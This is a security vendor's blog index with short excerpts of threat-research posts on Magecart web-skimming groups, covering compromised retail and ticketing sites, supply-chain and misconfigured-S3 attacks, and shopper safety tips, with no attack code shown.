Blog

Magecart

Labs Magecart

MakeFrame: Magecart Group 7’s Latest Skimmer

At RiskIQ, we track many different Magecart groups. We continually observe evolutions in the techniques they employ to skim card data and obfuscate the code that they use for that purpose. These skimmers are becoming increasingly capable, fulfilling a variety of functions to optimize the work of the operators that deploy them. 

On January 24th, we first became aware of a new Magecart skimmer, which we dubbed MakeFrame after its ability to make iframes for skimming payment data. We initially flagged it with our machine learning model for detecting obfuscated code. 

Since then, we have captured several different versions of the skimmer, each sporting various levels of obfuscation, from dev versions in clear code to finalized versions using encrypted obfuscation. So far, RiskIQ has observed MakeFrame on 19 different victim sites. 

In some cases, we've seen MakeFrame using compromised sites for all three of its functions—hosting the skimming code itself, loading the skimmer on other compromised websites, and exfiltrating the stolen data. There are several elements of the MakeFrame skimmer that are familiar to us, but it's this technique in particular that reminds us of Magecart Group 7.

The following is our analysis of this unique skimmer and the process we followed to attribute this skimmer to Magecart Group 7.

Continue Reading
Labs Magecart

Magecart Group 8 Blends into NutriBullet.com Adding To Their Growing List of Victims

On Thursday, February 20th, around 3 pm GMT, criminals RiskIQ identifies as Magecart Group 8 placed a JavaScript skimmer on the international website for blender manufacturer NutriBullet, nutribullet.com. Our systems caught the cyber attack as it happened and continue to detect new developments.

After multiple attempts to contact NutriBullet and receiving no response*, RiskIQ decided to initiate the takedown of the attacker exfiltration domain with the help of AbuseCH and ShadowServer. Group 8 operators were using this domain to receive stolen credit card information, and its takedown prevented there being new victims.

On March 1st, we observed the skimmer had been removed, but on March 5th, around 7 pm GMT, the cyber attackers placed a new skimmer on the NutriBullet website. We again scrambled to get the infrastructure neutralized. Unfortunately, the criminals still have access to NutriBullet's infrastructure and can continue to replace the skimmer domain in the code to make it work again. Again on March 10th, the cyber attackers were back with another skimmer in yet another script on the NutriBullet website. Until NutriBullet acknowledges our outreach and performs a cleanup, we highly advise against making any purchases on the site as customer data is endangered.

As with all breaches, RiskIQ’s technology and researchers will continue to keep a close eye on the breach and work to take down any additional domains stood up by the criminals. 

The First Skimmer

Continue Reading
Labs Magecart

Magecart Group 12’s Latest: Actors Behind Cyberattacks on Olympics Ticket Re-sellers Deftly Swapped Domains to Continue Campaign

A recent blog post by Jacob Pimental and Max Kersten highlighted Magecart activity targeting ticket re-selling websites for the 2020 Olympics and EUFA Euro 2020, olympictickets2020.com and eurotickets2020.com respectively. These sites were compromised by a skimmer using the domain opendoorcdn.com for data exfiltration. With RiskIQ data, our researchers built on the previous reporting to identify more skimming domains used by the attackers, as well as additional compromised sites. RiskIQ can also now attribute all these cyberattacks to Magecart Group 12. 

The obfuscation and skimming code we observed on opendoorcdn.com matches that used by Magecart Group 12, whose skimmer and obfuscation techniques we analyzed in our blog posts, "New Year, Same Magecart: The Continuation of Web-based Supply Chain Attacks" and "Magento Attack: All Payment Platforms are Targets for Magecart Attacks." However, there are differences in the techniques employed by Group 12 in these more recent compromises, which we'll break down here.

In those blog posts, we noted that Group 12 employed base64 encoded checks against the URL looking for the word "checkout" to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL. Quoting from our May 1st, 2019 report:

"Most of Group 12's injections occur with a pre-filter on the page—a small snippet of JavaScript that checks to see if they want to inject their skimmer on the page. Here's what it looks like:"

Magecart Group 12's script tag from RiskIQ's May report

Continue Reading
External Threat Management Magecart

Magecart: New Research Shows the State of a Growing Threat

Magecart is a rapidly growing cybercrime syndicate comprised of dozens of subgroups that specialize in cyberattacks involving digital credit card theft by skimming online payment forms. It's also fundamentally changing the way we view browser security. 

A global phenomenon, Magecart is threatening the ability of consumers worldwide to shop online safely by stealthily intercepting their credit card data via their browser without the consumer or website owner's knowledge. Although it's just now getting global attention, Magecart has been active for nearly ten years—RiskIQ's earliest Magecart observation occurred on August 8th, 2010. 

Magecart works by operatives gaining access to websites either directly or via third-party services in supply-chain attacks and injecting malicious JavaScript that steals the data shoppers enter into online payment forms, typically on checkout pages. Quietly, it's eating away at the e-commerce industry because website owners lack visibility into the code that's running on their site, which is a bigger problem than most people realize. Skimming code can exist on a breached website for weeks, months, or even indefinitely, victimizing any visitor that makes purchases on that site.

RiskIQ's global discovery platform gathers internet-wide telemetry that enables us to view websites as Magecart actors do; a unique perspective that provides unmatched visibility into this surging threat. In our latest report, we share the valuable insights gleaned from this telemetry data, which yields critical insight into the state of Magecart, whose skimmers have appeared over two million times, and directly breached over 18,000 hosts. 

Continue Reading
External Threat Management Magecart

The Consumer Guide to Shopping Safely in the Age of Magecart

For the last ten years, the e-commerce industry has been battling a stealthy enemy in digital web skimming. Dubbed Magecart by RiskIQ when we first reported on the threat, these groups of cybercriminals have been intercepting credit card information from users making purchases online by breaching websites and injecting their Javascript web skimmers on checkout pages. Just like a physical web skimmer a real-world criminal might put on an ATM or gas pump, these digital skimmers intercept credit card numbers, expirations dates, and CVV numbers when a consumer purchases something online. It then exfiltrates that data to an attacker-owned server to be used by the hacker or sold on the dark web.

From small shops to giant household names like Newegg, Ticketmaster, and British Airways, these attacks have affected thousands of sites, and potentially millions of consumers, all without virtually anyone knowing. The most significant factor in Magecart's success is that most site owners lack visibility into the code running on their site. As a result, the average Magecart skimmer lasts over two weeks, with many lasting much longer than that. 

While the onus is very squarely on businesses to protect their customers by increasing their visibility into the code running on their websites, Magecart is only growing more prevalent. In the meantime, consumers can take precautions to avoid being victimized and having their credit card information feed this criminal enterprise. 

Yonathan Klijsnma, RiskIQ's Head Threat Researcher and the leading expert on Magecart, offers five tips you can take as an online shopper to stay safe.

Check the reputation

Continue Reading
Labs Magecart

Old Magecart Domains are Being Bought Up for Monetization

Old Magecart domains are finding new life in subsequent cyber threat campaigns, many of which are entirely unrelated to web skimming. 

Over the years, we’ve outed many Magecart web-skimming campaigns in reports that denoted IOCs, including malicious domains that cyber attackers used to inject web-skimming JavaScript into browsers or as a destination for the skimmed payment information. Large portions of these malicious domains have been taken up for sinkholing by various parties. However, some of them are kicked offline by the registrar, put on hold, and then eventually released back into the pool of available domains.

Here’s the catch: when these domains come back online, they retain their call-outs to malicious domains placed on breached websites by cyber attackers, which means they also retain their value to cyber threat actors. Bad guys are taking advantage of these domains coming back up for sale and purchasing them to be once again pressed into service for malicious purposes, whether that be more web skimming or for use in malvertising campaigns.

Hijacking JavaScript injections

Many website owners are never aware of an active skimmer threat on their site—RiskIQ found that the average Magecart skimmer stays on a site for over two months, and many stay there indefinitely. The entire lifecycle of these malicious domains—loading JavaScript to an infected website, going offline, and then coming back online again—can pass without the website owner having an inkling that something was wrong. 

Continue Reading
External Threat Management Magecart

RiskIQ Launches JavaScript Threats Solution Amidst Surge in Browser-based Cyber Attacks

Browser-based cyber attacks append malicious JavaScript to websites once every five minutes, according to RiskIQ detection data. These cyber attacks, such as web-skimming, cryptocurrency mining, fingerprinting, and waterholing encounters, are responsible for some of the most high-profile breaches in recent history. These digital security breaches include the hack of British Airways, which led to cyber threat actors intercepting credit card data for thousands of customers.

The BA breach, surfaced by RiskIQ last fall, was carried out by the crime syndicate Magecart. Most recently, a sophisticated Magecart group compromised thousands of sites with a supply chain cyber attack targeting misconfigured Amazon S3 buckets.

In the months and years to come, new breeds of these web skimming cyber attacks will likely emerge, whether by new or existing Magecart groups. Payment data is currently the focus, but they will pivot to skim other information such as login credentials. These cyber attacks can take the form of direct compromises to digital security or supply chain compromises in which third-party JavaScript, such as analytics code, is compromised. Supply chain cyber attacks give perpetrators massive reach by granting them access to potentially thousands of sites at once.

Lucrative for perpetrators, cybercrime syndicates have created entire economies around JavaScript attacks with vibrant markets emerging for stolen data, web skimmers, and compromised websites. Meanwhile, businesses are left to weather the reputational and financial damage with loss of market share, lawsuits, and punitive regulatory fines.

The material damages to businesses from JavaScript attacks took sharp focus earlier this month when the first post-GDPR fine was imposed against British Airways for the breach of its digital security. The proposed amount of £183m represents 1.5% of BA's 2017 revenues and dwarfs the largest pre-GDPR fine levied by the UK's Information Commissioner's Office (ICO) of £500,000.

Continue Reading
Labs Magecart

Spray and Pray: Magecart Campaign Breaches Websites En Masse Via Misconfigured Amazon S3 Buckets

On May 14th, RiskIQ covered the latest mass compromise of third-party web suppliers by a Magecart group. This initial report focused on seven of these suppliers, the scripts of which were injected with skimmer code, which possibly affected several thousand websites using their services. 

However, the actual scale of this campaign and the number of sites affected is much larger than previously reported. The actors behind these compromises have automated the process of compromising websites with skimmers by actively scanning for misconfigured Amazon S3 buckets. These buckets are un-secure because they are misconfigured, which allows anyone with an Amazon Web Services account to read or write content to them.

RiskIQ has been monitoring the compromise of S3 buckets since the beginning of the campaign, which started in early April 2019. We’ve been working with Amazon and affected parties to address Magecart injections and misconfigured S3 buckets as we observe them.

We wrote the following article to raise awareness around the security policies for Amazon S3 as well as web-skimming attacks in general.

Discovery of Misconfigured Bucket

Continue Reading
Labs Magecart

Magecart Supply-chain Frenzy Continues With AppLixir, RYVIU, OmniKick, eGain, AdMaxim, CloudCMS & Picreel

Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.

Web-based supply-chain attacks, which compromise vendors that supply code that adds or improves website functionality, gives attackers access to a wide range of victims at once because the compromised code often integrates with thousands of sites. In this blog, we'll break down the Magecart skimming activity on these seven providers and detail when and how the compromises occurred, including how some of them could have been far worse.

A Widespread Campaign

As the timestamps below indicate, the majority of these compromises happened near the same day, Friday, May 10th.

Some of the targets in this campaign do not even process payments on their websites, showing that the attackers used a “shotgun” approach to great effect, compromising as many websites as they could knowing that at least some of them would be lucrative. RiskIQ found evidence of many other sites also being compromised, including:

Continue Reading